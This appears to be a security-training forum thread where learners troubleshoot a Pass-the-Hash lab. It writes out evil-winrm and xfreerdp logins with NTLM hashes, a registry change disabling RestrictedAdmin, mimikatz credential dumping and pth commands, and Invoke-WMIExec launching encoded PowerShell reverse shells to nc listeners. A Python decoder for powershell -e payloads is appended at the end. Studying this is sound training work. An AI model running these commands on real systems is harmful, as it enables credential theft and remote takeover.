Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01)

Hello all

As many people have said, some tasks seem to be particularly difficult, which can be very frustrating, although it gives the opportunity to hone micro techniques (which is what I keep in mind to provide motivation). This question has got the better of me for too long now.

I will provide a sequence of methods, commands and outcomes undertaken; can someone please let me know where I'm going wrong here :smile:. I feel as though I'm completing everything correctly but still can't manage to catch a shell.

  1. Firstly, I'm using evil-winrm to change the restricted admin mode with the following commands:

evil-winrm -i 10.129.204.23 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

  2. Next, I'm using xfreerdp to RDP to the machine using the following command:

xfreerdp /v:10.129.204.23 /u:Administrator /pth:30B3783CE2ABF1AF70F77D0660CF3453

  3. Following this, I'm dumping NTLM hashes using mimikatz with the following commands:

privilege::debug

sekurlsa::logonPasswords full

  4. This gives me the NTLM hashes for 4 user accounts (I won't provide the hashes here to avoid spoilers):

MS01
julio
david
john

  5. Next, I RDP using julio's creds as per the question.

  6. From there I try to initiate a pass the hash (PTH) using mimikatz with MS01's creds (this is to enable the listener with MS01 as the user, as the question states that the machine will only connect back to MS01). This executes with no errors; however, when whoami is run, the user printed is still julio (to try and mitigate the error I tried the same process when RDPing using admin creds, which allowed me to PTH into MS01). This was done using the following command:

mimikatz.exe privilege::debug "sekurlsa::pth /user:MS01 /rc4:27306e8dad558c047eb35761abb16fc1 /domain:inlanefreight.htb /run:cmd.exe" exit

  7. A nc listener is configured to listen on port 8001.

  8. Finally, using powershell the following commands are executed to catch the shell (the following socket was configured in the powershell3 base64 rev shell generator - 127.16.1.5:8001):

Import-Module .\Invoke-TheHash.psd1

Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e <base64 here>"

Note: all instances of cmd and ps are run as admin.

I have tried this sequence various times, on my local machine and with the pwnbox, and I just can't get it to work. I'm thinking my error lies in step 6, where I can't PTH to MS01.

Thanks for taking the time to read and all help appreciated :pray: :facepunch:


I'm not sure, pretty stuck on that part as well. Last question and it sucks, I'll try once more.

Make sure to generate your own shell using https://www.revshells.com/ . I couldn’t get it to work with the shell provided in their notes, even though the IP and ports used were identical. I generated my own and came right up.

Hi,
did you get the solution for this task?
I've been stuck for a week; can you please suggest a hint if you have completed this task?

Try using a different port than 8001 when generating your reverse shell and setting your listener (port could be in use).

have you solved your problem?

Yeah, are you looking for some help? Let me know and I’ll have a look over my notes when home later

I have solved this problem. Thank you, it took a few hours to understand.

I had some issues too with this, and these steps helped me:

  • removed the -domain flag.
  • kept the user as julio.
  • added -verbose to troubleshoot.
  • did an Import-Module .\Invoke-TheHash.psd1 in Powershell.

For the raw shell, I picked Powershell #3 on the left hand list. In the shell drop down pick "powershell" and leave the encoding drop box set to none. I also changed my port to 9434. You want to use the IP of the attack windows host. Then I copied just the encoded block into the example shown in the section and updated the parameters/flags accordingly.

Can anyone explain to me in a logical manner what is the ask in the last question of PtH section:

Using Julio’s hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

Let’s go step by step, following the instructions:

  1. Using Julio’s hash, perform a Pass the Hash attack, launch a PowerShell console

I am logged in through xfreerdp to 10.129.131.149 with user "Administrator" and password "30B3783CE2ABF1AF70F77D0660CF3453". My interpretation of the instruction is the following:

c:\tools>.\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:julio /rc4:64f12cddaa88057e06a81b54e73b949b /domain:inlanefreight.htb /run:powershell.exe" exit

  2. import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01)

I go to the required site and I generate a revshell as instructed:

Then I open a nc listener:

c:\tools>nc.exe -lvnp 9999
listening on [any] 999 ...

And try to send and catch the reverse shell as follows:

PS C:\tools\Invoke-TheHash> Import-Module .\Invoke-WMIExec.ps1
PS C:\tools\Invoke-TheHash> Invoke-WMIExec -Target 172.16.1.10 -DOMAIN inlanefreight.htb -Username julio -Hash 64f12cddaa88057e06a81b54e73b949b -Command "powershell -e <base64 here>"

A connection attempt seems to happen, but no matter how long I wait or how many ports I change, it never goes through:

I am stuck here for hours on end!


From where you have gotten to in the listener, try "hostname"; remember you're looking for DC01.
You can message me directly if you still need further instruction

I got it ‘solved’, I just had to press “Enter” for the prompt to appear :joy:!


It’s been a while since I completed this lab but I’m sure the issue I was having had something to do with the powershell script/syntax. In the lesson htb provides multiple examples of ps scripts with slightly different syntax which is easily overlooked. Try using the other examples. Hope this helps :heart:


hello,
I’m stuck at the same place and can’t move forward. Help would be great.

Just got it right after 3 hours…
Be careful not to leave blank spaces when filling in the parameters for the payload on revshells.
First RDP to the box with the Admin user and its hash.
This is the syntax for mimikatz:

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:julio /rc4:64f12cddaa88057e06a81b54e73b949b /domain:inlanefreight.htb /run:powershell.exe" exit

then you will get a powershell instance to do:

  • Import-Module .\Invoke-WMIExec.ps1 or Import-Module .\Invoke-TheHash.psd1
  • then start your listener and type (replace the b64 with your generated payload):

Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e <base64 here>"

You should get the revshell!

The revshell is against this IP: 176.16.1.5

Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e <base64 here>" and then open a cmd on the same target and write whoami;hostname

and then "inlanefreight\julio
DC01" must appear…

then “type C:\julio\flag.txt”

and there is!! =D
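Several posters above lost hours to the encoded payload itself (the encoding drop box on revshells.com, stray blanks pasted into its parameters, a blob copied incompletely). The same `powershell -e <base64>` string is also what a defender sees in process-creation telemetry (Windows event 4688 or Sysmon event 1) when Invoke-WMIExec runs it on DC01, so a small decoder is useful on both sides. The following Python helper is an added example, not code from this thread, from Invoke-TheHash or from revshells.com: it pulls the encoded argument out of a command line, checks that it is well-formed base64 of UTF-16LE (what `powershell -e` requires), reports the common copy mistakes, and extracts the host and port the decoded script would connect to. The sample command line is constructed here and contains only a `TCPClient` connect line with the thread's 172.16.1.5:8001, not a full payload.

```python
import base64
import binascii
import re

# Constructed sample: one connect line of the kind a "PowerShell #3" generator emits.
# It is built here for the example and is not the thread's payload.
SAMPLE_SCRIPT = "$client = New-Object System.Net.Sockets.TCPClient('172.16.1.5',8001);"

ENCODED_ARG_RE = re.compile(r"(?:-encodedcommand|-enc|-ec|-e)\s+(\S+)", re.IGNORECASE)
TCPCLIENT_RE = re.compile(r"TCPClient\(\s*['\"]([^'\"]*)['\"]\s*,\s*(\d+)\s*\)", re.IGNORECASE)


def encode_for_powershell(script: str) -> str:
    """Encode a script the way `powershell -e` expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command line as it would appear in a 4688 / Sysmon process-creation record.
SAMPLE_CMDLINE = "powershell -e " + encode_for_powershell(SAMPLE_SCRIPT)


def looks_like_text(s: str) -> bool:
    """True when every character is printable ASCII or ordinary whitespace."""
    return all(32 <= ord(c) < 127 or c in "\r\n\t" for c in s)


def decode_encoded_command(cmdline: str) -> dict:
    """Decode the -e/-EncodedCommand argument of a command line and report
    the defects that commonly break a copied payload.

    Returns a dict with keys: ok, problems, and on success script, host, port.
    """
    problems = []
    m = ENCODED_ARG_RE.search(cmdline)
    if not m:
        return {"ok": False, "error": "no encoded command argument found", "problems": problems}
    blob = m.group(1).strip("'\"")

    if len(blob) % 4:
        problems.append("base64 length is not a multiple of 4 (blob truncated or padding lost)")
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError) as exc:
        return {"ok": False, "error": f"base64 decode failed: {exc}", "problems": problems}
    if len(raw) % 2:
        problems.append("odd byte count: cannot be UTF-16LE")

    # PowerShell decodes the bytes as UTF-16LE. If that yields garbage but the
    # bytes read cleanly as UTF-8, the generator's encoding option was wrong.
    script = None
    try:
        candidate = raw.decode("utf-16-le")
        if looks_like_text(candidate):
            script = candidate
    except UnicodeDecodeError:
        pass
    if script is None:
        try:
            candidate = raw.decode("utf-8")
        except UnicodeDecodeError:
            return {"ok": False, "error": "not decodable as UTF-16LE or UTF-8", "problems": problems}
        if not looks_like_text(candidate):
            return {"ok": False, "error": "decoded bytes are not a text script", "problems": problems}
        problems.append("payload was base64-encoded as UTF-8; powershell -e expects UTF-16LE")
        script = candidate

    result = {"ok": True, "script": script, "problems": problems, "host": None, "port": None}
    conn = TCPCLIENT_RE.search(script)
    if conn:
        host_raw, port = conn.group(1), int(conn.group(2))
        if host_raw != host_raw.strip():
            problems.append("whitespace inside the host string (parameter pasted with blanks)")
        result["host"], result["port"] = host_raw.strip(), port
    else:
        problems.append("no TCPClient(host, port) call found in the decoded script")
    return result


if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE,
                 "powershell -e " + base64.b64encode(SAMPLE_SCRIPT.encode("utf-8")).decode(),
                 "powershell -nop -c whoami"):
        r = decode_encoded_command(line)
        print(r.get("host"), r.get("port"), r["problems"] or r.get("error"))
```

Run against the sample line it reports 172.16.1.5 and 8001 with no problems; fed a blob that was base64-encoded as UTF-8 it names the encoding mistake instead of printing CJK garbage, which is the symptom of the revshells encoding option being set to anything but none. On the defensive side the same function turns the `-e` argument in a process-creation event into the remote host and port, which is the first thing a triage analyst needs from such a record.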